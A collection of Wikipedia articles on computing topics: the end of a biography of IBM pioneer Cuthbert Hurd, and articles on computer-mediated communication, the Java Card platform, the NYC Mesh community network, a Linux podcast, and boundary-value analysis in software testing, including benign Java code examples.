Hurd hired John von Neumann as a consultant. The eccentric genius was known for his fast driving, and IBM often would pay von Neumann's traffic fines. They developed a personal friendship, with Hurd visiting von Neumann in Walter Reed Army Medical Center as he was dying of cancer.
At the time, IBM calculators were programmed by plugging and unplugging wires manually into large panels. The concept of storing the program as well as data in computer memory was generally called the Von Neumann architecture (although others developed the concept about the same time).
IBM had built the experimental stored-program SSEC, but company president Thomas J. Watson favored basing commercial products on punched card technology with manual programming. Hurd hired a team who would be the first professional computer software writers, such as John Backus and Fred Brooks.
The first step was to offer a calculator that could be programmed on punch cards in addition to a manual plugboard. This was the Card-Programmed Electronic Calculator, announced in May 1949. It was essentially a commercialized version of experiments done by Wallace John Eckert and customers at Northrop Corporation, but became a very popular product, shipping several thousand units in various models.
Based on this demand, Hurd advised new company president Tom Watson, Jr. to build the first IBM commercial stored program computer, first called the Defense Calculator. It was marketed as the IBM 701 in 1952.
There were 18 model 701 machines built (in addition to the Engineering development machine).
In 1953 Hurd convinced IBM management to develop what became the IBM 650 Magnetic Drum Data Processing Machine.
Although the UNIVAC I (and Ferranti Mark 1 in England) had been introduced earlier than any IBM computer, its high price (while IBM offered monthly leases) limited sales. The lower expense of the 650 meant it could be purchased in much larger quantities. Almost 2000 were produced between 1953 and 1962, to commercial customers as well as academics.
On January 19, 1955, Hurd became director of the IBM Electronic Data Processing Machines Division when T. Vincent Learson was promoted to Vice President of Sales. In 1955, Hurd made a proposal to Edward Teller for a computer to be used at the Lawrence Livermore Laboratory. This would evolve into the IBM "Stretch" project. The ambitious promises made for the performance of the machine were not met when it was finally delivered in 1961 as the model 7030, although techniques developed and lessons learned in its design were used on other IBM products.
California
After 1962, he served as chairman of the Computer Usage Company, the first independent computer software company, and president from 1970 through 1974.
He then consulted for various firms in Silicon Valley, and served as an expert witness in the IBM antitrust cases. From 1978 to 1986, Hurd served as chairman for Picodyne Corporation, which he co-founded with H. Dean Brown.
Hurd was a founder of Quintus Computer Systems in 1983 with William Kornfeld, Lawrence Byrd, Fernando Pereira and David H. D. Warren to commercialize a Prolog compiler.
Hurd was president and chairman until Quintus was sold to Intergraph Corporation in October 1989.
In 1967, Drake University awarded Hurd an honorary LLD degree.
In 1986 he received the Computer Pioneer Award from the IEEE Computer Society for his contributions to early computing.
In his later life he lived in Portola Valley, California, became an avid gardener and studied native California plants. A variety of Arctostaphylos manzanita is named Dr. Hurd for him. He died there May 22, 1996.
He endowed scholarships in Mathematics and Computer Science at Stanford University.
Publications
1943, Mathematics for Mariners with Chester E. Dimick. New York: D Van Nostrand Company Inc, 1943.
1950, "The IBM Card-Programmed Electronic Calculator" in: Proceedings, Seminar on Scientific Computation November, 1949, IBM, p. 37-41.
1955, "Mechanical Translation: New Challenge to Communication Ornstein", in: Science 21 October 1955: pp. 745–748.
1983. Special Issue: The IBM 701 Thirtieth Anniversary - IBM Enters the Computing Field, Annals of the History of Computing, Vol. 5 (No. 2), 1983
1985, "A note on early Monte Carlo computations and scientific meetings", in: IEEE Annals of the History of Computing archive, Volume 7, Issue 2 (April 1985) pp 141–155.
1986, "Prologue," IEEE Annals of the History of Computing, vol. 8, no. 1, pp. 6–7, Jan-Mar, 1986
See also
List of pioneers in computer science
History of computing
Timeline of computing
History of computing hardware
IBM 700/7000 series
References
Further reading
1954, "Russian is turned into English by a fast electronic translator" by Robert K.Plumb in: The New York Times, 8 January 1954, p. 1 (front page),col.5.
1996, "Update," in: Computer, vol. 29, no. 7, pp. 92–94, Jul., 1996
External links
Cuthbert C. Hurd Papers, 1946-1992 at the Charles Babbage Institute, University of Minnesota.
Three oral history interviews with Cuthbert Hurd, 20 January 1981, 18 November 1994 and 28 August 1995, Charles Babbage Institute, University of Minnesota. Hurd discusses International Business Machines research in computer technology, IBM's support for academic research on computers, and his own work at IBM—especially on the IBM 701, 704 and 705 computers. He also describes John von Neumann and his contributions to the development of computer technology. Discusses interactions with Oak Ridge National Laboratory and Los Alamos National Laboratory.
1911 births
1996 deaths
American computer scientists
IBM employees
United States Coast Guard officers
People from Estherville, Iowa
People from Portola Valley, California
Military personnel from California
Military personnel from Iowa
|
320498
|
https://en.wikipedia.org/wiki/Computer-mediated%20communication
|
Computer-mediated communication
|
Computer-mediated communication (CMC) is defined as any human communication that occurs through the use of two or more electronic devices. While the term has traditionally referred to those communications that occur via computer-mediated formats (e.g., instant messaging, email, chat rooms, online forums, social network services), it has also been applied to other forms of text-based interaction such as text messaging. Research on CMC focuses largely on the social effects of different computer-supported communication technologies. Many recent studies involve Internet-based social networking supported by social software.
Forms
Computer-mediated communication can be broken down into two forms: synchronous and asynchronous. Synchronous computer-mediated communication refers to communication that occurs in real-time. All parties are engaged in the communication simultaneously; however, they are not necessarily all in the same location. Examples of synchronous communication are video chats and FaceTime audio calls. On the contrary, asynchronous computer-mediated communication refers to communication that takes place when the parties engaged are not communicating in unison. In other words, the sender does not receive an immediate response from the receiver. Most forms of computer-mediated technology are asynchronous. Examples of asynchronous communication are text messages and emails.
Scope
Scholars from a variety of fields study phenomena that can be described under the umbrella term of computer-mediated communication (CMC) (see also Internet studies). For example, many take a sociopsychological approach to CMC by examining how humans use "computers" (or digital media) to manage interpersonal interaction, form impressions and maintain relationships. These studies have often focused on the differences between online and offline interactions, though contemporary research is moving towards the view that CMC should be studied as embedded in everyday life. Another branch of CMC research examines the use of paralinguistic features such as emoticons, pragmatic rules such as turn-taking and the sequential analysis and organization of talk, and the various sociolects, styles, registers or sets of terminology specific to these environments (see Leet). The study of language in these contexts is typically based on text-based forms of CMC, and is sometimes referred to as "computer-mediated discourse analysis".
The way humans communicate in professional, social, and educational settings varies widely, depending not only on the environment but also on the method by which the communication occurs, which in this case is through computers or other information and communication technologies (ICTs). The study of communication to achieve collaboration—common work products—is termed computer-supported collaboration and includes only some of the concerns of other forms of CMC research.
Popular forms of CMC include e-mail, video, audio or text chat (text conferencing including "instant messaging"), bulletin board systems, list-servs, and MMOs. These settings are changing rapidly with the development of new technologies. Weblogs (blogs) have also become popular, and the exchange of RSS data has better enabled users to each "become their own publisher".
Characteristics
Communication occurring within a computer-mediated format has an effect on many different aspects of an interaction. Some of those that have received attention in the scholarly literature include impression formation, deception, group dynamics, disclosure reciprocity, disinhibition and especially relationship formation.
CMC is examined and compared to other communication media through a number of aspects thought to be universal to all forms of communication, including (but not limited to) synchronicity, persistence or "recordability", and anonymity. The association of these aspects with different forms of communication varies widely. For example, instant messaging is intrinsically synchronous but not persistent, since one loses all the content when one closes the dialog box unless one has a message log set up or has manually copy-pasted the conversation. E-mail and message boards, on the other hand, are low in synchronicity since response time varies, but high in persistence since messages sent and received are saved. Properties that separate CMC from other media also include transience, its multimodal nature, and its relative lack of governing codes of conduct. CMC is able to overcome physical and social limitations of other forms of communication and therefore allow the interaction of people who are not physically sharing the same space.
If communication is defined as a learning process that requires a sender and a receiver, technology can be a powerful tool in that process. According to Nicholas Jankowski in his book The Contours of Multimedia, a third party, such as software, acts as an intermediary between sender and receiver. The sender interacts with this third party in order to send a message, and the receiver interacts with it as well, creating an additional interaction with the medium itself alongside the one originally intended between sender and receiver.
The medium in which people choose to communicate influences the extent to which they disclose personal information. CMC is marked by higher levels of self-disclosure in conversation than face-to-face interactions. Self-disclosure is any verbal communication of personally relevant information, thoughts, and feelings which establishes and maintains interpersonal relationships. This is due in part to visual anonymity and the absence of nonverbal cues, which reduce concern for losing positive face. According to Walther's (1996) hyperpersonal communication model, computer-mediated communication is valuable in providing better communication and better first impressions. Moreover, Ramirez and Zhang (2007) indicate that computer-mediated communication allows more closeness and attraction between two individuals than face-to-face communication. Online impression management, self-disclosure, attentiveness, expressivity, composure and other skills contribute to competence in computer-mediated communication. In fact, there is considerable correspondence between skills in computer-mediated and face-to-face interaction, even though there is great diversity of online communication tools.
Anonymity, and in part privacy and security, depend more on the context and the particular program being used or web page being visited. However, most researchers in the field acknowledge the importance of considering the psychological and social implications of these factors alongside the technical "limitations".
Language learning
CMC is widely discussed in language learning because it provides opportunities for language learners to practice their language. For example, Warschauer conducted several case studies on using email or discussion boards in different language classes. Warschauer claimed that information and communications technology "bridge the historic divide between speech...and writing". Thus, the rapid growth of the Internet has generated considerable interest in second-language (L2) reading and writing research. In the learning process, students, especially children, need cognitive learning, but they also need social interaction, which meets their psychological needs. Although technology can powerfully assist English language learners, it cannot by itself cover every aspect of the learning process.
Benefits
The nature of CMC means that it is easy for individuals to engage in communication with others regardless of time, location, or other spatial constraints. Because CMC allows individuals to collaborate on projects that would otherwise be impossible due to factors such as geography, it has enhanced social interaction not only between individuals but also in working life. In addition, CMC can be useful for allowing individuals who might be intimidated due to factors like character or disabilities to participate in communication. By allowing an individual to communicate in a location of their choosing, CMC lets a person engage in communication with minimal stress. Making an individual comfortable through CMC also plays a role in self-disclosure, which allows a communicative partner to open up more easily and be more expressive. When communicating through an electronic medium, individuals are less likely to engage in stereotyping and are less self-conscious about physical characteristics. The role that anonymity plays in online communication can also encourage some users to be less defensive and form relationships with others more rapidly.
Disadvantages
While computer-mediated communication can be beneficial, technological mediation can also inhibit the communication process. Unlike face-to-face communication, nonverbal cues such as tone and physical gestures, which assist in conveying the message, are lost through computer-mediated communication. As a result, the message being communicated is more vulnerable to being misunderstood due to a wrong interpretation of tone or word meaning. Moreover, according to Dr. Sobel-Lojeski of Stony Brook University and Professor Westwell of Flinders University, the virtual distance that is fundamental to computer-mediated communication can create a psychological and emotional sense of detachment, which can contribute to sentiments of societal isolation.
Crime
Cybersex trafficking and other cyber crimes involve computer-mediated communication. Cybercriminals can carry out the crimes in any location where they have a computer or tablet with a webcam or a smartphone with an internet connection. They also rely on social media networks, videoconferences, pornographic video sharing websites, dating pages, online chat rooms, apps, dark web sites, and other platforms. They use online payment systems and cryptocurrencies to hide their identities. Millions of reports of these crimes are sent to authorities annually. New laws and police procedures are needed to combat crimes involving CMC.
See also
Emotions in virtual communication
Internet relationship
Discourse community
References
Further reading
External links
Applied linguistics
Information systems
Internet culture
he:למידה משולבת מחשב
|
2070564
|
https://en.wikipedia.org/wiki/Java%20Card
|
Java Card
|
Oracle Java Card technology is a software platform that allows Java-based applications (applets) to be run securely on smart cards and, more generally, on similar secure small-memory-footprint devices called "secure elements" (SE). A secure element is a tamper-resistant hardware environment capable of securely hosting applications and their confidential and cryptographic data. The most common form of secure element is a one-chip secure microcontroller, found in smart cards and other removable cryptographic tokens. New form factors have started to emerge, however, from embedded SEs (a non-removable secure microcontroller soldered onto a device board) to new security designs embedded into general-purpose chips. Java Card addresses this hardware fragmentation and these specificities while retaining the openness and code portability brought forward by Java. Java Card is the smallest of the Java platforms and is targeted at embedded devices. Java Card gives the user the ability to program the devices and make them application specific. It is widely used in different markets: wireless telecommunications within SIM cards and embedded SIMs, payment within banking cards and NFC mobile payment, and identity cards, healthcare cards, and passports. Several IoT products, such as gateways, also use Java Card based products to secure communications with a cloud service, for instance. End users of Java Card technology include mobile operators, financial institutions, governments, mobile device makers, healthcare associations, enterprises and transportation authorities. Standards bodies such as ETSI, GlobalPlatform, GSMA and others leverage Java Card as part of their specifications.
The first Java Card was introduced in 1996 by Schlumberger's card division, which later merged with Gemplus to form Gemalto. Java Card products are based on the specifications by Sun Microsystems and continued by Oracle Corporation. Many Java Card products also rely on the GlobalPlatform specifications for the secure management of applications on the card (download, installation, personalization, deletion).
The main design goals of Java Card technology are portability, security and backward compatibility.
Portability
Java Card aims at defining a standard smart card computing environment allowing the same Java Card applet to run on different smart cards, much like a Java applet runs on different computers. As in Java, this is accomplished using the combination of a virtual machine (the Java Card Virtual Machine) and a well-defined runtime library, which largely abstracts the applet from differences between smart cards. Portability remains limited by issues of memory size, performance, and runtime support (e.g. for communication protocols or cryptographic algorithms).
Security
Java Card technology was originally developed for the purpose of securing sensitive information stored on smart cards. Security is determined by various aspects of this technology:
Data encapsulation Data is stored within the application, and Java Card applications are executed in an isolated environment (the Java Card VM), separate from the underlying operating system and hardware.
Applet firewall Unlike other Java VMs, a Java Card VM usually manages several applications, each one controlling sensitive data. Different applications are therefore separated from each other by an applet firewall which restricts and checks access of data elements of one applet to another.
Cryptography Commonly used symmetric key algorithms like DES, Triple DES, AES, and asymmetric key algorithms such as RSA, elliptic curve cryptography are supported as well as other cryptographic services like signing, key generation and key exchange.
Applet The applet is a state machine which processes only incoming command requests and responds by sending data or response status words back to the interface device.
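A minimal applet following this state-machine pattern might look like the sketch below. The class name, counter field and instruction byte 0x10 are illustrative assumptions and not part of any standard; the Applet, APDU, ISO7816, ISOException and Util classes come from the standard javacard.framework package.

import javacard.framework.APDU;
import javacard.framework.Applet;
import javacard.framework.ISO7816;
import javacard.framework.ISOException;
import javacard.framework.Util;

// Hypothetical applet that returns an incrementing counter on a custom instruction.
public class CounterApplet extends Applet {

    private static final byte INS_GET_COUNTER = (byte) 0x10; // illustrative INS code
    private short counter;                                    // stored in persistent memory

    private CounterApplet() {
        counter = 0;
    }

    // Invoked by the runtime when the applet is installed on the card.
    public static void install(byte[] bArray, short bOffset, byte bLength) {
        new CounterApplet().register();
    }

    // The state machine: every incoming command APDU is dispatched here.
    public void process(APDU apdu) {
        if (selectingApplet()) {
            return; // the SELECT command itself needs no further handling
        }
        byte[] buffer = apdu.getBuffer();
        switch (buffer[ISO7816.OFFSET_INS]) {
            case INS_GET_COUNTER:
                counter++;
                Util.setShort(buffer, (short) 0, counter);      // write response data
                apdu.setOutgoingAndSend((short) 0, (short) 2);  // send 2 bytes back
                break;
            default:
                ISOException.throwIt(ISO7816.SW_INS_NOT_SUPPORTED); // error status word
        }
    }
}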
Design
At the language level, Java Card is a precise subset of Java: all language constructs of Java Card exist in Java and behave identically. This goes to the point that as part of a standard build cycle, a Java Card program is compiled into a Java class file by a Java compiler; the class file is post-processed by tools specific to the Java Card platform.
However, many Java language features are not supported by Java Card (in particular types char, double, float and long; the transient qualifier; enums; arrays of more than one dimension; finalization; object cloning; threads). Further, some common features of Java are not provided at runtime by many actual smart cards (in particular type int, which is the default type of a Java expression; and garbage collection of objects).
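To illustrate, code written for such cards typically avoids int and re-casts intermediate results explicitly, since the Java language promotes byte and short operands to int. The following is a minimal sketch under those assumptions; the class and method names are made up, and it is written as plain Java so it can be run on a desktop JVM.

// Illustrates the cast-heavy arithmetic style used when int is unavailable on the card.
public class ShortMath {
    // Adds two short values; the expression a + b is an int in Java, so an explicit
    // narrowing cast is required, and the result silently wraps on overflow.
    public static short add(short a, short b) {
        return (short) (a + b);
    }

    public static void main(String[] args) {
        System.out.println(add((short) 30000, (short) 5000)); // prints -30536 (wrap-around)
    }
}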
Bytecode
Java Card bytecode run by the Java Card Virtual Machine is a functional subset of Java 2 bytecode run by a standard Java Virtual Machine but with a different encoding to optimize for size. A Java Card applet thus typically uses less bytecode than the hypothetical Java applet obtained by compiling the same Java source code. This conserves memory, a necessity in resource-constrained devices like smart cards. As a design tradeoff, there is no support for some Java language features (as mentioned above), and there are size limitations. Techniques exist for overcoming the size limitations, such as dividing the application's code into packages below the 64 KiB limit.
Library and runtime
The standard Java Card class library and runtime support differ greatly from those in Java, and the common subset is minimal. For example, the Java Security Manager class is not supported in Java Card, where security policies are implemented by the Java Card Virtual Machine; and transients (non-persistent, fast RAM variables that can be class members) are supported via a Java Card class library, while they have native language support in Java.
Specific features
The Java Card runtime and virtual machine also support features that are specific to the Java Card platform:
Persistence With Java Card, objects are by default stored in persistent memory (RAM is very scarce on smart cards, and it is only used for temporary or security-sensitive objects). The runtime environment as well as the bytecode have therefore been adapted to manage persistent objects.
Atomicity As smart cards are externally powered and rely on persistent memory, persistent updates must be atomic. The individual write operations performed by individual bytecode instructions and API methods are therefore guaranteed atomic, and the Java Card Runtime includes a limited transaction mechanism (a sketch of how persistence and transactions appear in applet code follows this list).
Applet isolation The Java Card firewall is a mechanism that isolates the different applets present on a card from each other. It also includes a sharing mechanism that allows an applet to explicitly make an object available to other applets.
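A hedged sketch of how persistence, transient storage and transactions typically surface in applet code is shown below. The class and field names are illustrative assumptions; JCSystem and Util are standard javacard.framework classes.

import javacard.framework.JCSystem;
import javacard.framework.Util;

// Illustrative fragment: persistent vs. transient storage plus an atomic update.
public class WalletState {
    private byte[] balanceRecord; // object fields and arrays persist by default
    private byte[] scratch;       // transient RAM buffer, cleared when the card resets

    WalletState() {
        balanceRecord = new byte[2];
        scratch = JCSystem.makeTransientByteArray((short) 16, JCSystem.CLEAR_ON_RESET);
    }

    // Updates the persistent record atomically: either both bytes change or neither does,
    // even if power is lost in the middle of the update.
    void updateBalance(short newBalance) {
        JCSystem.beginTransaction();
        Util.setShort(balanceRecord, (short) 0, newBalance);
        JCSystem.commitTransaction();
    }
}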
Development
Coding techniques used in a practical Java Card program differ significantly from those used in a Java program. Still, the fact that Java Card uses a precise subset of the Java language shortens the learning curve and enables using a Java environment to develop and debug a Java Card program (caveat: even if debugging occurs with Java bytecode, make sure that the class file fits the limitations of the Java Card language by converting it to Java Card bytecode, and test on a real Java Card smart card early on to get an idea of its performance). Further, one can run and debug both the Java Card code for the application to be embedded in a smart card and a Java application that will be in the host using the smart card, all working jointly in the same environment.
Versions
Oracle has released several Java Card platform specifications and is providing SDK tools for application development.
Usually smart card vendors implement just a subset of the algorithms specified in the Java Card platform, and the only way to discover which subset of the specification is implemented is to test the card.
Version 3.1 (17.12.2018)
Added configurable key pair generation support, named elliptic curves support, new algorithms and operations support, additional AES modes and Chinese algorithms.
Version 3.0.5 (03.06.2015)
Oracle SDK: Java Card Classic Development Kit 3.0.5u1 (03.06.2015)
Added support for Diffie-Hellman modular exponentiation, Domain Data Conservation for Diffie-Hellman, Elliptic Curve and DSA keys, RSA-3072, SHA3, plain ECDSA, AES CMAC, AES CTR.
Version 3.0.4 (06.08.2011)
Oracle SDK: Java Card Classic Development Kit 3.0.4 (06.11.2011)
Added support for DES MAC8 ISO9797.
Version 3.0.1 (15.06.2009)
Oracle SDK: Java Card Development Kit 3.0.3 RR (11.11.2010)
Added support for SHA-224, SHA-2 for all signature algorithms.
Version 2.2.2 (03.2006)
Oracle SDK: Java Card Development Kit 2.2.2 (03.2006)
Added support for SHA-256, SHA-384, SHA-512, ISO9796-2, HMAC, Korean SEED MAC NOPAD, Korean SEED NOPAD.
Version 2.2.1 (10.2003)
Oracle SDK: Java Card Development Kit 2.2.1 (10.2003)
Version 2.2 (11.2002)
Added support for AES cryptography key encapsulation, CRC algorithms, Elliptic Curve Cryptography key encapsulation, Diffie-Hellman key exchange using ECC, ECC keys for binary polynomial curves and for prime integer curves, AES, ECC and RSA with variable key lengths.
Version 2.1.1 (18.05.2000)
Oracle SDK: Java Card Development Kit 2.1.2 (05.04.2001)
Added support for RSA without padding.
Version 2.1 (07.06.1999)
Java Card 3.0
The version 3.0 of the Java Card specification (draft released in March 2008) is separated in two editions: the Classic Edition and the Connected Edition.
The Classic Edition (currently at version 3.0.5 released in June 2015) is an evolution of the Java Card Platform version 2 (which last version 2.2.2 was released in March 2006), which supports traditional card applets on resource-constrained devices such as Smart Cards. Older applets are generally compatible with newer Classic Edition devices, and applets for these newer devices can be compatible with older devices if not referring to new library functions. Smart Cards implementing Java Card Classic Edition have been security-certified by multiple vendors, and are commercially available.
The Connected Edition (currently at version 3.0.2, released in December 2009) aims to provide a new virtual machine and an enhanced execution environment with network-oriented features. Applications can be developed as classic card applets requested by APDU commands or as servlets using HTTP to support web-based schemes of communication (HTML, REST, SOAP ...) with the card. The runtime uses a subset of the Java 6 bytecode, without floating point; it supports volatile objects (garbage collection), multithreading, inter-application communication facilities, persistence, transactions, card management facilities, and so on. As of 2021, there has been little adoption in commercially available smart cards, so much so that references to Java Card (including in the present article) often implicitly exclude the Connected Edition.
See also
Java Card OpenPlatform
References
External links
Java Card overview (Oracle)
JavaCards-OpenSC
Java device platform
Smart cards
|
60662231
|
https://en.wikipedia.org/wiki/NYC%20Mesh
|
NYC Mesh
|
NYC Mesh is a physical network of interconnected routers and a group of enthusiasts working to support the expansion of the project as a freely accessible, open, wireless community network. NYC Mesh is not an internet service provider (ISP), although it does connect to the internet and offer internet access as a service to members. The network includes over 600 active member nodes throughout the five boroughs of New York City, with concentrations of users in lower Manhattan and Brooklyn.
Aim
The goal of NYC Mesh is to build a large scale, decentralized digital network, owned by those who run it, that will eventually cover all of New York City and neighboring urban areas.
Participation in the project is governed by its Network Commons License.
This agreement, partially modeled on a similar license in use by Guifi.net, lists four key tenets:
Participants are free to use the network for any purpose that does not limit the freedom of others to do the same,
Participants are free to know how the network and its components function,
Participants are free to offer and accept services on the network on their own terms, and
By joining the free network, participants agree to extend the network to others under the same conditions.
Other similar projects include Freifunk in Germany, Ninux in Italy, Sarantaporo.gr in Greece, the People's Open Network in Oakland, CA, and Red Hook Wi-Fi in Brooklyn, NY.
Technology
Like many other free community-driven networks, NYC Mesh uses mesh technology to facilitate robustness and resiliency. Additionally, between larger nodes, the project uses the Border Gateway Protocol (BGP). Nodes are connected via WiFi links similar to those used by wireless routers in homes, but with more powerful routers that are able to function as a backbone, making connections at distances up to a mile.
History
NYC Mesh was founded in 2012 and was originally based on the Cjdns protocol.
In 2015 the project received a grant from ISOC-NY, the New York chapter of the Internet Society.
NYC Mesh connects to the internet via the DE-CIX internet exchange point (IXP) at its first super node, Sabey Data Center at 375 Pearl Street, peering with companies such as Akamai, Apple, Google, and Hurricane Electric. Later, another supernode was opened up on the roof of Cologuard Brooklyn, another data center.
The project received a membership boost due to the U.S. Federal Communications Commission vote in December 2017 to repeal its 2015 net neutrality rules. Coinciding with this decision, the average number of member sign-up requests per month jumped from about 20 to over 400.
See also
DIY networking
Mesh networking
Net neutrality
Freifunk
Guifi.net
References
External links
Community networks
Custom firmware
Mesh networking
Wireless
|
8954445
|
https://en.wikipedia.org/wiki/The%20Linux%20Link%20Tech%20Show
|
The Linux Link Tech Show
|
The Linux Link Tech Show is one of the longest running Linux podcasts in the world. Episode 500 aired on April 10, 2013.
Distribution
The Linux Link Tech Show is broadcast live on the internet every Wednesday at 8:30 P.M. Eastern Standard Time. Podcasts are made available shortly after under a Creative Commons license.
History
It was originally started by Lehigh Valley Linux User Group members Dann Washko and Linc Fessenden in September 2003. Allan Metzler, "the guy that brought the equipment", soon joined the show as a regular host in October of that year. In early 2005 Patrick Davila (who was a member of the same LUG as Dann and Linc) joined the show as a permanent host, completing the current Tech Show lineup. Initially their goal was simply to provide "a weekly *live* webcast radio-style show about Linux and Technology", but they have since expanded into podcasting. In fact, they were one of the very early adopters, and their own Linc Fessenden wrote BashPodder because he was unhappy with the state of Linux podcast clients at the time.
In March 2009 it was announced several new guest hosts would be joining the show on a weekly rotating basis. The initial guest hosts include Chess Griffin, Dave Yates, Chad Wollenberg, Joel "Gorkon" Mclaughlin and Justin "threethirty" O'Brien.
The 365th show was recorded/broadcast on Wednesday the 4th of August 2010, when the hosts decided it was time to throw in the towel on their "1st season". The "2nd season" kicked off the weekend of September 11, 2010 during Ohio Linux Fest.
2014 Roster of Regular LocalHosts includes: Dann Washko, Dan "The Man" Frey, Pat Davila, Joel "Gorkon" McLaughlin, Rich "FlyingRich" Hughes, and T.J. "Pegwole" Werhley.
The hosts provide an entertaining viewpoint and have joked about being The Original Cockroaches of Podcasting. Their 13th anniversary broadcast of show 675 occurred on Wednesday September 21, 2016.
Guests
The Linux Link Tech Show have had a number of key figures (from 15 different countries) from the free and open source software community as guests. Guests have included Richard Stallman, Chris DiBona, Bruce Perens, Ian Murdock, Patrick Volkerding, Mark Shuttleworth, Nat Friedman, Ted Ts'o and Miguel de Icaza.
Further reading
OpenMoko Project Press Coverage Page
Software Freedom Law Center
KDE.org website
References
External links
HPR Community members remember the digital dragon
Interview of KDE Developer Aaron Seigo- Episode 101 in MP3 and OGG
Technology podcasts
|
1709986
|
https://en.wikipedia.org/wiki/Boundary-value%20analysis
|
Boundary-value analysis
|
Boundary-value analysis is a software testing technique in which tests are designed to include representatives of boundary values in a range. The idea comes from the boundary between equivalence partitions. Given that we have a set of test vectors to test the system, a topology can be defined on that set. Those inputs which belong to the same equivalence class, as defined by equivalence partitioning theory, would constitute the basis. Given that the basis sets are neighbors, there would exist a boundary between them. The test vectors on either side of the boundary are called boundary values. In practice this would require that the test vectors can be ordered, and that the individual parameters follow some kind of order (either partial order or total order).
Formal definition
Formally the boundary values can be defined as below:
Let the set of the test vectors be X = {x1, ..., xn}.
Let's assume that there is an ordering relation defined over them, denoted ≤.
Let C1, C2 be two equivalence classes.
Assume that test vector x1 ∈ C1 and x2 ∈ C2.
If x1 ≤ x2 or x2 ≤ x1, then the classes C1 and C2 are in the same neighborhood and the values x1, x2 are boundary values.
In plainer English, values on the minimum and maximum edges of an equivalence partition are tested. The values could be input or output ranges of a software component, or ranges internal to the implementation. Since these boundaries are common locations for errors that result in software faults, they are frequently exercised in test cases.
Application
The expected input and output values to the software component should be extracted from the component specification. The values are then grouped into sets with identifiable boundaries. Each set, or partition, contains values that are expected to be processed by the component in the same way. Partitioning of test data ranges is explained in the equivalence partitioning test case design technique. It is important to consider both valid and invalid partitions when designing test cases.
The demonstration can be done using a function written in Java.
class Safe {
    // Adds two ints and warns when the mathematical sum falls outside the int range.
    static int add(int a, int b)
    {
        int c = a + b;
        // Both operands non-negative but the result wrapped to negative: overflow.
        if (a >= 0 && b >= 0 && c < 0)
        {
            System.err.println("Overflow!");
        }
        // Both operands negative but the result wrapped to non-negative: underflow.
        if (a < 0 && b < 0 && c >= 0)
        {
            System.err.println("Underflow!");
        }
        return c;
    }
}
On the basis of the code, the input vectors (a, b) are partitioned. The blocks we need to cover are the overflow statement, the underflow statement, and neither of these two. That gives rise to 3 equivalence classes, from the code review itself.
We note that there is a fixed size of integer, hence Integer.MIN_VALUE ≤ a + b ≤ Integer.MAX_VALUE must hold for the sum to be representable.
We note that the input parameters a and b are both integers, hence a total order exists on them.
When we compute the equalities a + b = Integer.MAX_VALUE and a + b = Integer.MIN_VALUE, we get back the values which are on the boundary, inclusive; that is, these pairs of (a, b) are valid combinations, and no underflow or overflow would happen for them.
On the other hand, a + b = Integer.MAX_VALUE + 1 gives pairs of (a, b) which are invalid combinations; overflow would occur for them. In the same way, a + b = Integer.MIN_VALUE - 1 gives pairs of (a, b) which are invalid combinations; underflow would occur for them.
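Concretely, boundary test vectors for the add method above can be exercised with a plain Java driver. The class below is an illustrative sketch; it assumes it is compiled alongside the Safe class, and the expected messages follow from the code shown earlier.

// Calls Safe.add at values on both sides of the overflow and underflow boundaries.
public class SafeBoundaryTest {
    public static void main(String[] args) {
        Safe.add(Integer.MAX_VALUE - 1, 1);  // sum is exactly Integer.MAX_VALUE: valid, no message
        Safe.add(Integer.MAX_VALUE, 1);      // sum exceeds Integer.MAX_VALUE: prints "Overflow!"
        Safe.add(Integer.MIN_VALUE + 1, -1); // sum is exactly Integer.MIN_VALUE: valid, no message
        Safe.add(Integer.MIN_VALUE, -1);     // sum is below Integer.MIN_VALUE: prints "Underflow!"
    }
}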
Boundary values (drawn only for the overflow case) are shown as the orange line in the figure on the right-hand side.
For another example, if the input values were months of the year, expressed as integers, the input parameter 'month' might have the following partitions:
... -2 -1 0 1 .............. 12 13 14 15 .....
--------------|-------------------|-------------------
invalid partition 1 valid partition invalid partition 2
The boundary between two partitions is the place where the behavior of the application changes; it is not a real number itself. The boundary value is the minimum (or maximum) value that is at the boundary. The number 0 is the maximum value in the first partition, and the number 1 is the minimum value in the second partition; both are boundary values. Test cases should be created to generate inputs or outputs that will fall on and to either side of each boundary, which results in two cases per boundary. The test cases on each side of a boundary should be in the smallest increment possible for the component under test; for an integer this is 1, but if the input were a decimal with 2 places then it would be 0.01. In the example above there are boundary values at 0, 1 and 12, 13, and each should be tested.
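A minimal sketch of these four test cases in Java, assuming a hypothetical isValidMonth helper that accepts the integers 1 through 12 (run with assertions enabled, java -ea):

// Two test cases per boundary for the month example: 0/1 and 12/13.
public class MonthBoundaryTest {
    // Assumed validator under test; only months 1..12 are valid.
    static boolean isValidMonth(int month) {
        return month >= 1 && month <= 12;
    }

    public static void main(String[] args) {
        assert !isValidMonth(0);  // maximum of invalid partition 1
        assert isValidMonth(1);   // minimum of the valid partition
        assert isValidMonth(12);  // maximum of the valid partition
        assert !isValidMonth(13); // minimum of invalid partition 2
    }
}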
Boundary value analysis does not require invalid partitions. Take an example where a heater is turned on if the temperature is 10 degrees or colder. There are two partitions (temperature≤10, temperature>10) and two boundary values to be tested (temperature=10, temperature=11).
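In code, again with a hypothetical predicate standing in for the component under test, only two boundary tests are needed because both partitions are valid inputs:

// Boundary tests for the heater example: both partitions are valid, so two cases suffice.
public class HeaterBoundaryTest {
    // Assumed behaviour under test: the heater is on at 10 degrees or colder.
    static boolean heaterOn(int temperature) {
        return temperature <= 10;
    }

    public static void main(String[] args) {
        assert heaterOn(10);  // boundary value in the "on" partition
        assert !heaterOn(11); // boundary value in the "off" partition
    }
}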
Where a boundary value falls within the invalid partition the test case is designed to ensure the software component handles the value in a controlled manner. Boundary value analysis can be used throughout the testing cycle and is equally applicable at all testing phases.
References
The Testing Standards Working Party website.
Software testing
|
31567052
|
https://en.wikipedia.org/wiki/International%20cybercrime
|
International cybercrime
|
